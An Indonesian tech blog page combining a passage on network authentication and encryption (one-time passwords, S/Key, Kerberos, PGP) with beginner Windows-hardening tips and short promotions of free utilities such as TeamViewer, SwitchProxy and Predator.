Hijacking biasanya terjadi pada komputer yang menghubungi jaringan kita, walaupun untuk beberapa kasus langka, bisa terjadi pada sembarang jalur yang dilaluinya. Sehingga akan bijaksana bila seorang NA mempertimbangkan pemberian kepercayaan akses, hanya dari komputer yang paling tidak mempunyai sistem security sama atau mungkin lebih ‘kuat’, dibandingkan dengan jaringan dibawah tanggung-jawabnya. Usaha memperkecil peluang musibah ini, juga dapat dilakukan dengan mengatur packet-filter dengan baik atau menggunakan server modifikasi. Misalnya, kita dapat menyediakan fasilitas anonymous-FTP bagi sembarang komputer dimanapun, tapi authenticated-FTP hanya diberikan pada host-host yang tercantum pada daftar ‘kepercayaan’. Hijacking ditengah jalur dapat dihindari dengan penggunaan enkripsi antar jaringan (end to end encryption).

Kerahasiaan data dan password juga merupakan topik disain security. Program yang didedikasikan untuk packet-sniffing dapat secara otomatis menampilkan isi setiap paket data antara client dengan servernya. Proteksi password dari kejahatan demikian dapat dilakukan dengan implementasi password sekali pakai (non-reusable password), sehingga walaupun dapat termonitor oleh sniffer, password tersebut tidak dapat digunakan lagi.

Resiko hijacking dan sniffing data (bukan password) tidak dapat dihindari sama sekali. Artinya NA harus mempertimbangkan kemungkinan ini dan melakukan optimasi bagi semakin kecil-nya kesempatan tersebut. Pembatasan jumlah account dengan akses penuh serta waktu akses jarak jauh, merupakan salah satu bentuk optimasi.

MEKANISME AUTENTISASI
Subyek autentisasi adalah pembuktian. Yang dibuktikan meliputi tiga kategori, yaitu: sesuatu pada diri kita (something you are SYA), sesuatu yang kita ketahui (something you know SYK), dan sesuatu yang kita punyai (something you have SYH). SYA berkaitan erat dengan bidang biometrik, seperti pemeriksaan sidik-jari, pemeriksaan retina mata, analisis suara dll. SYK identik dengan password. Sedangkan bagi SYH umumnya digunakan kartu identitas seperti smartcard. \

Barangkali, yang sekarang masih banyak digunakan adalah sistem ber-password. Untuk menghindari pencurian password dan pemakaian sistem secara ilegal, akan bijaksana bila jaringan kita dilengkapi sistem password sekali pakai. Bagaimana caranya penerapan metoda ini?

Pertama, menggunakan sistem perangko-waktu ter-enkripsi. Dengan cara ini, password baru dikirimkan setelah terlebih dulu dimodifikasi berdasarkan waktu saat itu. Kedua, menggunakan sistem challenge-response (CR), dimana password yang kita berikan tergantung challenge dari server. Kasarnya kita menyiapkan suatu daftar jawaban (response) berbeda bagi ‘pertanyaan’ (challenge) yang berbeda oleh server. Karena tentu sulit sekali untuk menghafal sekian puluh atau sekian ratus password, akan lebih mudah jika yang dihafal adalah aturan untuk mengubah challenge yang diberikan menjadi response (jadi tidak random). Misalnya aturan kita adalah: “kapitalkan huruf kelima dan hapus huruf keempat”, maka password yang kita berikan adalah MxyPtlk1W2 untuk challenge sistem Mxyzptlk1W2.

Kalau pada sistem CR, harus diketahui ‘aturan’-nya, maka pada sistem perangko-waktu, kita mesti mengingat password bagi pemberian perangko-waktu ini. Apakah cara seperti ini tidak mempersulit? Beruntung sekali mekanisme tersebut umumnya ditangani oleh suatu perangkat, baik perangkat lunak ataupun dengan perangkat keras. Kerberos, perangkat lunak autentisasi yang dibuat di MIT dan mengadopsi sistem perangko-waktu, mewajibkan modifikasi client bagi sinkronisasi waktu dengan server serta pemberian password perangko-waktu. Modifikasi program client mengingatkan kita pada proxy dan memang, kurang lebih seperti itu. Sistem CR biasanya diterapkan sekaligus dengan dukungan perangkat keras. Contoh sistem CR operasional adalah perangkat SNK-004 card (Digital Pathways) yang dapat diterapkan bersama-sama dengan paket TIS-FWTK (Trusted Information System – internet FireWall ToolKit).

TIS-FWTK menawarkan solusi password sekali pakai (sistem CR) yang ‘menyenangkan’: S/Key. S/Key menerapkan prosedur algoritma hash iteratif terhadap suatu seed, sedemikian sistem dapat memvalidasi response-client instant tapi tidak mempunyai kemampuan untuk memprediksi response-client berikutnya. Sehingga bila terjadi penyusupan pada sistem, tidak ada ‘sesuatu’ yang bisa dicuri (biasanya daftar password). Algoritma hash mempunyai dua sifat utama. Pertama, masukan tidak bisa diregenerasikan dari keluaran (non-reversibel). Kedua, terdapat dua kemungkinan masukan bagi sebuah keluaran yang sama.

ENKRIPSI DAN CRYPTOGRAPHY
Cryptography telah berkembang sejak lama, ketika orang menginginkan informasi yang ia kirimkan tidak dapat ‘dibaca’ oleh pihak tak berkepentingan. Secara tradisional cryptography dikenal dengan dua mekanisme, kunci privat atau kunci publik. DES (data encryption standard) yang digunakan oleh Kerberos menggunakan sistem kunci-privat. RSA (Rivest Shamir Addleman) mengimplementasikan sistem kunci-publik. Salah satu dari kontributor RSA, Ron Rivest kemudian membuat MD4 (message digest function # 4) yang digunakan oleh S/Key-nya TIS-FWTK. Optimasi dan blasteran antara kedua metoda tradisional ini melahirkan PGP (Pretty Good Privacy). Pembahasan dari DES, RSA, atau PGP merupakan buku tersendiri dan tidak pada tempatnya diungkapkan disini. Tapi yang jelas, sistem kunci-privat dicirikan dengan proses encrypt-decrypt melalui kunci identik, sedangkan pada sistem kunci-publik, proses ini dilakukan dengan dua buah kunci: kunci publik untuk encrypt dan kunci rahasia untuk decrypt dimana kedua kunci ini digenerasikan dan mempunyai relasi dekat melalui sebuah algoritma matematis. Karena diperlukan proses matematis terlebih dulu, kecepatan sistem kunci-publik bisa ribuan kali lebih lambat dari algoritma kunci-privat ekivalen walaupun disisi lain menawarkan proteksi lebih baik. Eksploitasi terhadap kelebihan dan kekurangan sistem kunci privat dan publik dilakukan PGP, dimana untuk transmisi data dilakukan secara sistem kunci-privat dengan session-key sehingga berjalan cepat, sedangkan transmisi session-key- nya sendiri menggunakan kunci-publik.

Dengan enkripsi, informasi yang kita kirimkan ke suatu jaringan melalui jaringan lain yang keamanannya meragukan (internet), relatif lebih terjamin. Enkripsi antar jaringan menyebabkan seorang ‘pencuri’ harus berusaha sedikit lebih keras untuk mendapatkan informasi ilegal yang ia harapkan. Ada beberapa kesempatan bagi implementasi enkripsi, yaitu: pada level aplikasi, level data-link, dan level jaringan.
Enkripsi pada level aplikasi mensyaratkan penggunaan perangkat lunak client-server khusus. Sesuai dengan model referensi OSI, enkripsi data-link hanya berlaku untuk hubungan titik ke titik, seperti sistem enkripsi pada modem telepon. Sedangkan enkripsi level jaringan (network layer) diterapkan pada router atau peralatan lain yang bersebelahan dengan jaringan dikedua sisi. Optimasi kepentingan dan kebijakan security dilakukan dengan mengatur jenis/bagian paket IP yang akan dienkrip, penyesuaian terhadap arsitektur firewall dan konsekuensinya, efektifitas distribusi kunci-enkripsi dll. Di masa depan, dimana teknologi VLAN (Virtual LAN) diperkirakan menjadi pilihan utama untuk Intranet (enterprisewide), penggunaan enkripsi level jaringan ini menjadi begitu penting. Barangkali sama pentingnya dengan keadaan sebuah perusahaan yang sementara ini ‘terpaksa’ menggunakan internet sebagai jalur bagi pengiriman informasi sensitif antara kantor pusat dengan cabangnya dibelahan bumi yang lain.

KERBEROS DAN TIS-FWTK AUTHENTICATION SERVER
Kerberos adalah salah satu karya proyek Athena, kolaborasi antara MIT, IBM dan DEC. Kerberos didisain untuk medukung autentisasi dan enkripsi data pada lingkungan terdistribusi melalui modifikasi client atau server standard. Beberapa vendor sistem operasi telah memasukan Kerberos kedalam produknya. MIT sendiri menyediakan secara free banyak versi Unix yang telah di-Kerberizing. Bahkan bagi kepentingan porting ke sistem operasi atau perangkat lunak client-server yang belum mendukung Kerberos, MIT menyediakan source-code nya, juga secara free. Proyek Athena sendiri mengimplementasikan Kerberos pada banyak aplikasi seperti NFS, rlogin, email, dan sistem password. Secure RPC (Sun Microsystems) juga mengimplementasikan hal yang sama.

Ada beberapa hal yang perlu dipertimbangkan dalam implementasi Kerberos. Modifikasi perangkat lunak client dan server akan menyebabkan pembatasan pilihan aplikasi. Sayangnya juga tidak ada metoda alternatif sebagai pengganti modifikasi source-code (seperti dalam proxy yang membolehkan custom user procedure atau custom client software). Kemudian, umumnya orang juga sepakat untuk menyebut: “Kerberos relatif sulit diterapkan/ dikelola”.

Paket sistem autentisasi lain ditawarkan oleh TIS-FWTK: authentication-server. Server ini didisain secara modular, fleksibel sehingga mendukung banyak mekanisme autentisasi populer seperti sistem password reusable standard, S/Key, card SecurdID dari Security Dynamics (sistem dengan perangko-waktu), card SNK-004 Digital Pathways (sistem CR) serta kemudahan untuk pengintegrasian mekanisme baru. Kembali kepada perbincangan diawal tulisan ini, kalau kepentingan utama kita adalah bagaimana menyiapkan ‘pertahanan’ bagi servis inbound non-anonymous, barangkali authentication-server adalah solusi yang patut dipertimbangkan. Mengapa? Bagaimana sistem ini bekerja? Tidak banyak ruang dalam tulisan ini untuk memuat semua diskusi kita tentang autentisasi, tapi ilustrasi penutup berikut akan memberikan sedikit gambaran bagi anda, peminat security jaringan, menyangkut authentication-server.
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips Meningkatkan Keamanan PC

Meningkatkan Keamanan PC

Banyak hal menjengkelkan yang bisa terjadi pada komputer kita. Misalnya ada orang yang baik sengaja atau pun tidak sengaja menghapus file-file penting kita. Atau merubah berbagai konfigurasi pada Windows. Selain itu bisa saja orang lain melihat file-file Anda yang bersifat rahasia. Kejadian seperti itu sangat mungkin terjadi bila komputer Anda merupakan komputer “umum”. Maksudnya banyak orang lain yang turut memakai, misalnya teman, adik atau saudara. Ingat, seorang pemula (dalam hal komputer) biasanya sangat senang mencoba-coba segala sesuatu pada komputer. Nah, untuk menghindari hal-hal yang tidak kita inginkan yang terjadi pada komputer kita Anda bisa mencoba berbagai langkah berikut ini:

1. Password BIOS
Pertama kali Anda mesti membuat password pada BIOS Anda. Mengapa ? Karena pada BIOS ini terdapat fasilitas untuk meng-enable dan men-disable beberapa sumber daya komputer kita. Walaupun ada cara yang mudah untuk menembus password ini, tapi setidaknya ini akan memperlambat sang penyusup….

2. Pastikan booting hanya dari harddisk.
Pada BIOS Anda, pastikan setting untuk booting hanya dari harddisk. Dengan kata lain disable fasilitas booting dari floopy disk, CD-ROM, atau media lainnya.

3. Men-disable Start-up Menu
Dengan mendisable startup menu ini maka orang lain (termasuk kita) hanya dapat booting melalui Windows (tidak bisa booting pada DOS Prompt). Caranya, pada file config.sys tambahkan : SWITCHES=/F/N to CONFIG.SYS. Pada bagian paling atas dari file autoexec.bat tambahkan :
@CTTY NUL
@BREAK OFF
@ECHO OFF
Sedang pada bagian paling akhir dari file autoexec.bat tambahkan : CTTY CON

4. Men-disable Boot Key
Maksudnya adalah mencegah penekanan tombol F8 dan F5 selama booting. Dengan menekan F8 maka akan muncul start-up menu. Cara mendisablenya : Bukalah file msdos.sys yang terletak pada direktori utama (C:\) dengan Notepad. Lalu gantilah Bootkeys=1 menjadi Bootkeys=0.


5. Menyembunyikan icon pada Control Panel
Pada Control Panel terdapat berbagai fasilitas untuk melakukan setting/konfigurasi pada komputer kita. Misalnya setting tentang password, printer, desktop themes, dll. Nah bila Anda tidak ingin ada orang lain yang ingin mengganti setting komputer Anda, Anda bisa melakukan aksi berikut, yakni menyembunyikan berbagai icon pada Control Panel. Caranya, pertama buka file control.ini yang terdapat pada folder c:\windows\control.ini (bila folder windows Anda bernama lain, silahkan disesuaikan). Lalu di bawah bagian [don't load] silahkan masukkan fasilitas yang tidak ingin Anda tampilkan. Misalnya untuk menyembunyikan icon password silahkan tulis “password.cpl=no”. Untuk menyembunyikan icon Desktop Setting, tulis “desk.ini=no”, dan seterusnya. Untuk melihat daftar file *.cpl bisa Anda lihat di c:\windows\system.


6. Proteksi dengan Software
Proteksi dengan software bisa bermacam-macam bentuknya. Pertama enkripsi. Dengan melakukan enkripsi (penyandian) orang lain akan kesulitan untuk membuka file yang di-enkripsi. Pada waktu melakukan enkripsi kita diharuskan untuk memasukkan password, yang mana password tersebut juga akan digunakan untuk melakukan dekripsi. Dengan begitu orang yang tidak tahu passwordnya tidak akan bisa membuka file tersebut dan tidak akan tahu isinya. Contoh software yang digunakan untuk melakukan enkripsi adalah Cryptext, PGP, dll. Selain dengan enkripsi ada cara lain untuk mengamankan file-file kita, yaitu dengan menggunakan software Win-Secure It dan Folder Guard. Dengan software tersebut kita bisa menyembunyikan file/folder, mencegah eksekusi program, mencegah penghapusan (delete), dll. File yang sudah disembunyikan (hidden) tidak akan terlihat pada Windows Explorer walaupun option Show All File diaktifkan. Mencegah orang lain mengeksekusi/menjalankan program menjadi sangat penting jika Anda mempunyai software untuk melakukan konfigurasi pada Windows, seperti WinBoost, Tweak UI, Start Menu Changer, dan sebagainya.

7. Bila Anda termasuk paranoid
Dengan enam langkah di atas komputer Anda sudah mempunyai tingkat keamanan yang lumayan (tentunya bukan lumayan bagi seorang hacker). Namun bila Anda termasuk paranoid atau betul-betul takut komputer Anda diisengin orang lain Anda bisa meneruskan langkah berikutnya. Yaitu hapus atau rename-lah file-file yang termasuk kategori “berbahaya” bila dijalankan, seperti fdisk.exe, format.exe, dll.
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Trik Menyembunyikan Icon Pada Control Panel

Menyembunyikan Icon Pada Control Panel

Pada bagian Control Panel kita dapat menjumpai berbagai applet yang dapat kita gunakan untuk membenahi berbagai setting pada Windows, mulai dari setting Display Properties, System Properties sampai mouse dan keyboard. Sayangnya kemudahan dalam melakukan setting tersebut membuat orang sering iseng-iseng mengganti settingnya. Ini tentu bukan hal yang menyenangkan.


Sebenarnya hal tersebut dapat dicegah dengan mudah, yaitu dengan menyembunyikan icon / applet pada control panel. Ada pun caranya adalah sebagai berikut:

Dari menu Start, pilih Run.

1. Ketikkan control.ini dan klik OK atau cukup tekan Enter.
2. Tambahkan baris di bawah [don't load].
3. Misalnya ingin menyembunyikan icon password, maka tambahkan password.cpl=no. netcpl.cpl=no untuk menyembunyikan icon Network. Daftar lebih lengkap bisa Anda lihat pada tabel di bawah.
4. Jika sudah selesai, simpan file control.ini tersebut dan restart komputer Anda untuk melihat perubahannya.

Appwiz.cpl=no
Add/Remove Programs

Desk.cpl=no
Display

Joy.cpl=no
Game Controllers

Modem.cpl=no
Modem

Mmsys.cpl=no
Multimedia and Sounds

Main.cpl=no
Keyboard, Mouse, Fonts, danPrinters

Netcpl.cpl=no
Network

Odbccp32.cpl=no
ODBC Data Sources

Password.cpl=no
Add/Remove Programs

Sysdm.cpl=no
Add New Hardware and System

Timedate.cpl=no
Date/Time

Cara yang lebih mudah adalah dengan menggunakan TweakUI. Caranya setelah Anda menjalankan TweakUI, pindah ke tab Control Panel. Hilangkan tanda check yang terdapat pada list box dan tekan Apply.
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Nonton TV Lewat Internet

Nonton TV Lewat Internet

Televisi merupakan salah satu sarana hiburan yang cukup murah meriah, setidaknya jika dibandingkan dengan menonton di bioskop atau bikin home theater di rumah Hanya saja “televisi biasa” punya keterbatasan, yaitu jumlah channel yang belum terlalu banyak. Jika Anda ingin menonton puluhan atau bahkan ratusan channel lain maka Anda harus berlangganan tv kabel.
Seiring dengan perkembangan teknologi dan internet maka saat ini untuk menonton siaran televisi tidak harus dari televisi “konvensional” tapi bisa juga dilakukan lewat internet. “Modal” yang harus ada adalah software dan koneksi internet yang memadai.

Jika Anda ingin menonton siaran televisi lewat internet Anda bisa menggunakan software Internet TV. Dengan menggunakan Internet TV Anda bisa menonton siaran televisi secara online dari lebih dari 5000 channel dari seluruh dunia. Untuk Indonesia, stasitun televisi yang sudah didukung adalah Bali TV, Metro TV, RCTI, TV One dan VOA Indonesia.
Interface atau antarmuka Internet TV terbagi dari 2 bagian. Sebelah kanan berisi daftar channel dan sebelah kiri adalah tampilan televisinya.
Cara menggunakan Internet TV cukup mudah. Anda tinggal memilih channel yang Anda inginkan yang terletak di sebelah kanan lalu klik tombol Play yang terletak di sebelah kiri bawah. Untuk menonton dalam ukuran layar penuh Anda tinggal klik tombol Full Screen.

Dapatkan Software'a disini


Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Kirim SMS Gratis Via Internet

Kirim SMS Gratis Via Internet'


SMS atau Short Message Service merupakan salah satu layanan yang paling populer yang disediakan oleh provider telepon seluler. Dengan layanan tersebut kirim atau tanya kabar teman atau saudara jadi jauh lebih mudah.

Saat ini biaya untuk kirim sms sudah cukup murah, bahkan beberapa provider memberikannya secara gratis (dengan syarat tertentu).

Jika provider telepon seluler yang Anda gunakan belum menyediakan layanan kirim sms secara gratis atau Anda ingin kirim sms tanpa harus mengurangi pulsa Anda, Anda bisa mencoba layanan mengirim sms secara gratis lewat internet yang disediakan oleh beberapa situs.

Berikut ini adalah tiga situs yang menyediakan layanan untuk kirim sms gratis lewat internet:

* KuSMS.com
* FreeSMS4us.com Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hamster Free Video Converter

Hamster Free Video Converter


Hamster Free Video Converter merupakan software gratis yang dapat Anda gunakan untuk mengconvert beragam lebih dari 40 jenis format file video, misalnya 3GP, MP3, MP4, AVI, MPG, WMV, MPEG, FLV, HD, DVD, M2TS, DIVX, XVID, VOB.
Software Hamster Free Video Converter mempunyai tampilan yang cukup user friendly sehingga mudah untuk digunakan. Anda tidak perlu pengetahuan khusus untuk menjalankan software ini. Anda tinggal pilih file yang akan dicovert, lakukan beberapa pengaturan lalu klik Convert.
Hamster Free Video Converter support 40 bahasa termasuk bahasa Indonesia sehingga cukup memudahkan Anda dalam mengoperasikan software tersebut.

Dapatkan Software'a disini


Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Mengelola dan Mempercantik Desktop Dengan 360desktop

Mengelola dan Mempercantik Desktop Dengan 360desktop


Tanpa Anda sadari, tampilan desktop di komputer Anda dapat mempengaruhi mood dan kinerja Anda. Tampilan desktop yang kurang menarik dan tidak interaktif akan membuat Anda mudah merasa jenuh, dan kurang bersemangat dalam bekerja. Sebaliknya, tampilan desktop yang segar dan menarik dapat menjadi sumber inspirasi Anda dalam bekerja.
Apabila Anda ingin membuat tampilan desktop Anda menjadi lebih menarik, Anda harus mencoba perangkat lunak 360Desktop. Perangkat lunak ini membuat tampilan desktop Anda lebih hidup, dan menciptakan ruangan lebih di desktop Anda sehingga Anda dapat menaruh apapun yang Anda inginkan di sana.

Dengan 360Desktop, Anda juga dapat dengan mudah mengambil konten dari web dan menaruhnya di desktop Anda. 360Desktop tidak hanya merubah penampilan desktop saja, tapi juga menambah berbagai macam fungsi yang sangat bermanfaat. Perangkat lunak 360Desktop ini dapat dioperasikan di komputer yang menggunakan Windows XP, Vista, dan Windows 7 versi 32bit dan 64bit.
Anda dapat mengunjungi situs resmi perangkat lunak 360Desktop di www.360Desktop.com. Disana Anda dapat mengunduh perangkat lunak ini dengan gratis. Tersedia 2 versi 360Desktop yang dapat Anda pilih, yaitu versi 32-bit dan versi 64-bit. Di situs ini Anda juga dapat melihat-lihat berbagai macam tema desktop yang dapat Anda gunakan dengan 360Desktop di komputer Anda. Tema 360Desktop tersedia dalam beberapa kategori, antara lain Animals, Business, Fashion, News, People, Travel, dan masih banyak lagi.
Jika Anda termasuk orang yang suka berkreasi, Anda dapat membuat sendiri wallpaper untuk 360Desktop anda. Dengan 360Desktop, desktop Anda menjadi sebuah kanvas interaktif untuk menuangkan segala ide dan konten kreatif Anda. Anda dapat dengan mudah menggabungkan berbagai macam konten seperti gambar, foto, atau album online favorit Anda.

Dapatkan Software'a Disini


Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Mengenal Proxy Server dan Fungsinya

Mengenal Proxy Server dan Fungsinya

Kata Proxy berasal dari bahasa Latin proximus, yang berarti dekat. Proxy server adalah sebuah server yang membantu kita untuk mempertahankan privasi kita dalam mengakses Internet. Saat kita mengakses Internet menggunakan proxy, web page yang kita kunjungi tidak akan dapat melihat kita. Web page tersebut hanya akan melihat proxy yang kita gunakan saja. Proxy server beroperasi sebagai berikut.

Client tersambung dengan proxy server, dan meminta layanan tertentu seperti file, koneksi, akses web page ataupun lainnya. Proxy server kemudian mengevaluasi permintaan layanan tersebut sesuai dengan aturan filter nya.

Sebagai contoh, proxy server dapat menyaring traffic berdasarkan IP address atau protocol. Jika permintaan tersebut divalidasi oleh filternya, maka proxy akan menyediakan apa yang diminta dengan menyambungkan ke server yang diminta dan meminta layanan dari server tersebut untuk client nya.

Proxy server dapat digunakan untuk berbagai macam keperluan antara lain:

* Untuk menyembunyikan server tertentu dari publik demi keamanan
* Untuk mempercepat akses ke resources yang diperlukan
* Untuk membuka situs-situs yang diblokir ditempat-tempat seperti sekolah, kantor, dan sebagainya.
* Untuk melewati kontrol keamanan/parental
* Untuk melindungi identitas saat sedang online

Proxy server yang melanjutkan permintaan dan jawaban tanpa modifikasi biasanya disebut dengan gateway atau tunneling proxy. Sebuah proxy server dapat ditaruh di komputer client, atau di beberapa lokasi diantara client dan server-server yang dituju.

Reverse proxy adalah sebuah proxy yang digunakan sebagai front-end, dengan maksud untuk mengontrol dan melindungi akses ke sebuah server atau private network. Biasanya reverse proxy melakukan hal-hal seperti load-balancing, authentication, decryption, atau caching.
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Membaca Buku dan Majalah Secara Online dengan GooReader

Membaca Buku dan Majalah Secara Online dengan GooReader


Sebelum dunia Internet menjadi semakin maju dan lengkap, kita harus membeli atau meminjam majalah ataupun buku yang ingin kita baca. Namun, sekarang kita dapat dengan mudah menemukan banyak sekali buku dan majalah yang dapat kita baca secara online.
Dengan Google Books, kita dapat menemukan jutaan buku serta majalah yang dapat kita baca secara gratis. Untuk menemukan buku yang ingin kita baca pun sangat mudah, karena kita dapat menggunakan fitur search yang disediakan. Memang, tidak semua buku ataupun majalah dapat kita baca secara keseluruhan. Banyak dari buku serta majalah di Google Books yang hanya merupakan preview. Namun jika kita jeli dalam mencari, kita dapat menemukan banyak buku yang dapat kita baca, atau bahkan kita unduh secara keseluruhan.

Membaca buku dan majalah secara online sangatlah mudah, dan aplikasi GooReader membuatnya menjadi semakin mudah. GooReader adalah desktop application yang memungkinkan kita untuk mencari, mengunduh, dan membaca buku serta majalah yang dapat kita temukan di Google Books, tanpa harus surfing menggunakan web browser. Antar muka GooReader membuat membaca buku dan majalah secara online menjadi jauh lebih nyaman. Kita dapat membuka halaman demi halaman dengan gerakan mouse yang natural dan halus.
Apikasi GooReader ini tersedia dalam versi free serta paid di situs resmi nya GooReader.com. Tentu saja, versi free memiliki fitur yang terbatas apabila dibandingkan dengan versi paid. Namun, versi free aplikasi ini cukup membantu bagi mereka yang suka membaca buku ataupun majalah secara online di Google Books. Aplikasi ini dapat digunakan di komputer yang menggunakan sistem operasi Windows XP, Vista, dan Windows 7 dengan .Net Framework 3.5 SP1.
 
Dapatkan Software'a Disini


Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Melakukan Remote Desktop Connection Dengan TeamViewer

Melakukan Remote Desktop Connection Dengan



Kita dapat mengontrol sebuah komputer dari jauh, dengan menggunakan perangkat lunak tertentu dan jaringan Internet. Masalahnya, kebanyakan perangkat lunak tersebut memerlukan banyak pengaturan yang bersifat teknis dan terlalu rumit. Namun, kini tersedia perangkat lunak yang dapat membantu kita mengontrol komputer secara remote dengan sangat mudah.

TeamViewer adalah perangkat lunak yang memungkinkan kita untuk melakukan desktop sharing melalui Internet. Kita dapat mengontrol komputer partner kita yang berada ditempat lain, dan melakukan berbagai hal. Semua ini sangat mudah untuk dilakukan, dan bahkan kita tidak perlu pusing dengan hal-hal yang bersifat teknis seperti firewalls, IP address, ataupun NAT.
Memang kita dapat menemukan banyak perangkat lunak yang serupa, tapi TeamViewer menyediakan solusi untuk semua jenis kebutuhan. TeamViewer sangat sederhana dan mudah untuk digunakan. Kita bahkan tidak perlu meng-install nya terlebih dahulu. Kita hanya perlu menjalankan perangkat lunak ini pada komputer kita, dan tentunya pada komputer yang ingin kita kontrol dari jauh.
Kita dapat melakukan banyak hal dengan bantuan TeamViewer. Sebagai contoh, kita dapat memperlihatkan desktop kita kepada partner kita, serta berbagi demo produk, presentasi, dan sebagainya. Kita juga dapat memanfaatkan TeamViewer untuk mengontrol sebuah server.
TeamViewer juga menyediakan fitur-fitur tambahan yang sangat bermanfaat, contohnya fitur file transfer, yang memudahkan kita dalam meng-copy file serta folder antara komputer kita dengan komputer partner kita.
Kita dapat mengunduh dan menggunakan TeamViewer secara gratis, asalkan untuk keperluan non-komersil. Di website resminya www.TeamViewer.com tersedia beberapa versi TeamViewer, yaitu TeamViewer full version, serta beberapa versi lain untuk keperluan yang lebih spesifik, seperti untuk memberikan layanan customer service, untuk mengontrol server, dan sebagainya.


Ambil Aplikasi'a Disini


Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Menyembunyikan IP Address Dengan SwitchProxy

Menyembunyikan IP Address Dengan SwitchProxy


Terkadang anda perlu membuat IP address anda tidak terlihat, demi keamanan jaringan komputer anda. Jika anda ingin IP address anda tidak terlihat, anda bisa menggunakan SwitchProxy. Add-on untuk Firefox ini memungkinkan anda untuk memantau dan mengganti dari beberapa setting proxy yang berbeda dengan mudah. Anda juga bisa menggunakan add-on ini sebagai Anonymizer untuk melindungi komputer anda dari gangguan pihak luar.

Kita semua tahu bahwa menggunakan lebih dari satu proxy dengan cara biasa sangat melelahkan karena kita harus terus menerus memantau semuanya. Dengan SwitchProxy anda dapat mengatur semua proxy yang anda gunakan dengan sangat mudah. Add-on ini juga menyediakan fitur untuk menyelipkan, mengedit, ataupun menghapus proxy dengan beberapa klik saja. Untuk menggunakan sebuah proxy, anda hanya perlu memilih dari daftar yang ada dan mengklik Apply.
Fitur Anonymizer yang disediakan oleh SwitchProxy menggunakan beberapa buah proxy yang secara acak berganti dalam interval tertentu. Fitur ini sangat bermanfaat bagi orang-orang yang ingin melindungi komputer mereka dari para hacker ataupun pihak-pihak lainnya.
Berikut adalah cara untuk membuat IP address anda tidak terlihat dengan menggunakan SwitchProxy:
Hal pertama yang perlu anda lakukan tentunya adalah mengunduh dan meng-install add-on SwitchProxy ini.
Setelah add-on ini ter-install, klik tombol Add, kemudian pilih Anonymous dari pilihan konfigurasi yang ada, dan klik Next


i window berikutnya, anda dapat menambahkan daftar proxy yang ingin anda gunakan baik secara manual ataupun menggunakan proxy list. Anda kemudian dapat memberikan nama untuk konfigurasi ini untuk memudahkan penggunaan selanjutnya, kemudian klik Save.


Anda dapat mencari daftar free proxy dari halaman ini.
Untuk mulai menyembunyikan IP address anda, anda harus memilih MyProxy dari toolbar, kemudian klik Apply. Sekarang IP address anda sudah tersembunyi. Sangat mudah bukan?
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips Mengunci Komputer Dengan USB Flash Drive

Mengunci Komputer Dengan USB Flash Drive

Kita semua sudah akrab dengan USB flash drive yang juga sering kita sebut dengan flash disk. Ternyata, flash disk tidak hanya dapat kita gunakan untuk menyimpan dan membawa file saja, tapi juga dapat digunakan untuk mengunci komputer, dengan bantuan aplikasi bernama Predator. Konsepnya sederhana, yaitu saat kita mencabut flask disk kita, komputer akan terkunci. Kemudian saat kita mencolokkan kembali flash disk tersebut, komputer akan dapat digunakan kembali.

Cara menggunakan aplikasi Predator ini sangat sederhana. Kita hanya perlu mencolokkan flash disk, menjalankan aplikasi Predator, dan mulai bekerja. Saat kita perlu meninggalkan komputer sebentar, kita tinggal mencabut flash disk kita, dan keyboard serta mouse akan terkunci. Layar komputer juga akan menjadi gelap. Saat kita kembali, kita hanya perlu mencolokkan kembali flash disk yang berfungsi sebagai kunci tadi, dan kita dapat langsung melanjutkan pekerjaan.

Aplikasi Predator juga dapat di-setting untuk menggunakan password saat kita akan membuka kunci komputer. Sebagai antisipasi apabila flash disk yang berfungsi sebagai kunci utama hilang, kita dapat membuat kunci cadangan dengan flash disk lain, yang dapat digunakan dalam keadaan darurat.

Aplikasi Predator ini tersedia dalam versi berbayar dan versi gratis. Kita dapat menggunakannya dengan gratis asalkan untuk penggunaan pribadi saja. Sayangnya, aplikasi ini hanya dapat digunakan pada komputer yang memakai sistem operasi Windows saja.

Homepage: http://www.montpellier-informatique.com/

Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips Menggunakan XMarks Untuk Melakukan Sinkronisasi Browser

Menggunakan XMarks Untuk Melakukan Sinkronisasi Browser


Aplikasi XMarks pada awalnya adalah FoxMarks, yang dapat kita gunakan untuk melakukan sinkronisasi bookmark yang kita lakukan dengan web browser Firefox ke beberapa komputer, apapun sistem operasi yang digunakan. XMarks, yang merupakan pengembangan dari Foxmarks dapat melakukan hal yang serupa, namun tidak terbatas untuk browser Firefox saja. Aplikasi ini dapat melakukan sinkronisasi antara Firefox, Chrome, Safari, dan Internet Explorer. Lebih hebatnya lagi, XMarks juga dapat melakukan sinkronisasi passwords dan tabs.

Aplikasi XMarks ini sangat mudah digunakan. Hal pertama yang harus kita lakukan tentu saja adalah meng-install nya di komputer kita. Program ini tersedia dalam bentuk plugin untuk Firefox, Chrome, Safari, dan Internet Explorer, yang dapat kita dapatkan di situs resmi XMarks di XMarks.com

Saat pertama kali kita meng-install XMarks, kita akan diminta untuk membuat akun terlebih dahulu. Setelah itu, kita dapat mengunggah, menggabungkan, atau mengganti bookmarks kita dengan bookmarks yang ada di dalam cloud. Kita juga harus mengaktifkan plugin ini di komputer-komputer lain yang nantinya akan kita sinkronkan.

Setelah semua langkah kita selesaikan, seluruh bookmarks kita akan disinkronkan di komputer-komputer yang telah kita beri plugin XMarks ini. Proses sinkronisasi ini akan dilaksanakan secara otomatis oleh XMarks.

